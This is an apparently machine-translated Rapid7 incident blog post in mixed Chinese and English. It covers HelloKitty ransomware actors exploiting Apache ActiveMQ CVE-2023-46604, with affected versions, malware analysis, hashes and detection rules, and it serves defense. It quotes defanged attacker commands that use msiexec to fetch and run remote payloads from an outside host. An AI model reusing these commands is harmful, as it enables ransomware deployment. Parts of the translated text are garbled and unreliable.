最后更新于2023年11月3日(星期五)18:32:32 GMT

Tom Elkins, 约翰Fenninger, Evan McCann, Matthew Smith, and Micah Young contributed attacker behavior insights to this blog.

周五开始, October 27, Rapid7 管理检测和响应 (MDR) identified suspected exploitation of Apache ActiveMQ CVE-2023-46604 in two different customer environments. 在这两个例子中, the adversary attempted to deploy ransomware binaries on target systems in an effort to ransom the victim organizations. 根据勒索信和现有证据, we attribute the activity to the HelloKitty ransomware family, 谁的源代码 was leaked 在10月初的一个论坛上. Rapid7 observed similar indicators of compromise across the affected customer environments, both of which were running outdated versions of Apache ActiveMQ.

CVE-2023-46604是一个 远程代码执行漏洞 in Apache ActiveMQ that allows a remote attacker with network access to a broker “to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.” This is one of the more convoluted vulnerability descriptions we’ve seen, but the 问题的根本原因 是不安全反序列化吗.

Apache 披露漏洞 并发布了新版本的ActiveMQ 2023年10月25日. 概念验证 exploit code and 漏洞细节 都是公开的. Rapid7’s vulnerability research team has tested the public PoC and confirmed that the behavior MDR observed in customer environments is similar to what we would expect from exploitation of CVE-2023-46604. Rapid7研究有一个 技术分析 说明attack kb中存在的漏洞.

受影响的产品

根据阿帕奇的 advisory, CVE-2023-46604影响如下:

  • Apache ActiveMQ.18.0 before 5.18.3
  • Apache ActiveMQ.17.0 before 5.17.6
  • Apache ActiveMQ.16.0 before 5.16.7
  • Apache ActiveMQ之前5.15.16
  • Apache ActiveMQ Legacy OpenWire模块.18.0 before 5.18.3
  • Apache ActiveMQ Legacy OpenWire模块.17.0 before 5.17.6
  • Apache ActiveMQ Legacy OpenWire模块.16.0 before 5.16.7
  • Apache ActiveMQ Legacy OpenWire模块.8.0 before 5.15.16

观察到的攻击者行为

在成功利用漏洞的过程中, Java.exe will contain the specific Apache application being targeted — in this case, D: \ \ ActiveMQ \ apache-activemq-5程序文件.15.3\bin\win64, which was observed as the parent process in both incidents. Post-exploitation, the adversary attempted to load remote binaries named M2.png and M4.png using MSIExec. The threat actor’s attempts at ransomware deployment were somewhat clumsy: In one of the incidents Rapid7 observed, there were more than half a dozen unsuccessful attempts to encrypt assets.

HelloKitty勒索软件详细信息

Rapid7获取了MSI文件 M4.png and M2.png 来自域172.245.16[.并在一个受控的环境中分析它们. After analysis, Rapid7 observed that both MSI files contained a 32-bit .内部命名的。NET可执行文件 dllloader. Within the .净可执行 dllloader, Rapid7 found that the executable loads a Base64-encoded payload. We decoded the Base64-encoded payload and determined that it was a 32-bit .NET DLL named EncDLL.

The EncDLL binary contained functionality similar to that of ransomware — the DLL searches for specific processes and stops them from running. Rapid7 observed the DLL will encrypt specific file extensions using the RSACryptoServiceProvider 函数,用扩展名附加加密文件 .locked. We also observed another function that provided information about which directories to avoid encrypting, 与勒索软件注释一起分配的静态变量, and a function that attempted communication to an HTTP server, 172.245.16[.]125.

The ransomware note indicated communications should occur through the email address service@hellokittycat [.]online.

妥协指标

Rapid7’s vulnerability research team analyzed CVE-2023-46604 and available public exploit code. 在我们的测试设置中, activemq.log had a single line entry for successful exploitation of CVE-2023-46604:

2023-10-31 05:04:58,736 | WARN  | Transport Connection to: tcp://192.168.86.35:15871失败:Java.net.SocketException: An established connection was aborted by the software in your host machine | org.apache.activemq.broker.TransportConnection.传输| ActiveMQ传输:tcp:///192.168.86.35:15871@61616

在上面的例子中,攻击者的(i.e.(研究人员的)IP是192.168.86.35,目标端口号为61616. More or less information may be available depending on the logging settings, which can be modified.

Other IOCs:

删除并执行的文件 msiexec command:

  • cmd.. Exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png"
  • cmd.. Exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m2.png"

The following files hashes were part of the two MSI packages downloaded 来自域172.245.16[.]125:

  • M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4
  • M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0
  • dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7
  • EncDll: 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C5

缓解指导

Organizations should update to a fixed version of ActiveMQ as soon as possible and look for indicators of compromise in their environments. Apache-supplied更新 都可以在这里找到. Apache also has information on improving the security of ActiveMQ implementations here.

Rapid7客户

Rapid7 MDR, InsightIDR, and pg电子 (MTC) customers have the following rules deployed and alerting on the post-exploitation activity related to this threat. Rapid7 recommends ensuring the Insight Agent is deployed to all applicable assets within our customers’ environments:

  • Suspicious Process - Apache ActiveMQ Launching CMD Process
  • 攻击者技术- MSIExec通过HTTP加载对象
  • Suspicious Process - Volume Shadow Service Delete Shadow Copies

InsightVM and Nexpose customers can assess their exposure to CVE-2023-46604 with an authenticated vulnerability check for Windows available in the November 1 content release.

Updates

2023年11月2日: Updated to reflect availability of InsightVM content and to correct IOC typos (missing character in the hash for EncDll,其中一个文件中的错误字符被删除).